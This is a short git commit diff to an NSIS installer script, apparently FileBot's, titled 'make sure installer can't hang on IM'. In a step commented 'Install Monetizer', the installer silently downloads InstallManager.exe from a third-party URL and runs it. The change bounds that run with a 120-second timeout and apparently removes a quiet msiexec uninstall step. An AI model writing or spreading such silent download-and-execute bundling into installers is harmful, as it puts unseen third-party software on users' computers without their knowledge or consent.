* make sure installer can't hang on IM

This commit is contained in:
Reinhard Pointner 2013-06-25 02:38:02 +00:00
parent 4c07edb65b
commit aa2b980386
1 changed files with 1 additions and 5 deletions

View File

@ -29,11 +29,7 @@ Section ""
;Install Monetizer
inetc::get /SILENT /CONNECTTIMEOUT 10 /RECEIVETIMEOUT 30 "http://www.comay13north.com/download.php?loGFcg==" "$PLUGINSDIR\InstallManager.exe" /end
nsExec::Exec '$PLUGINSDIR\InstallManager.exe'
;Remove old version
DetailPrint "Removing older versions..."
nsExec::Exec 'msiexec /quiet /x {2DE5DAFC-A5E4-41C2-8123-C358BA5A562D}'
nsExec::Exec /TIMEOUT=120000 '$PLUGINSDIR\InstallManager.exe'
DetailPrint "Downloading latest version..."
;Install latest FileBot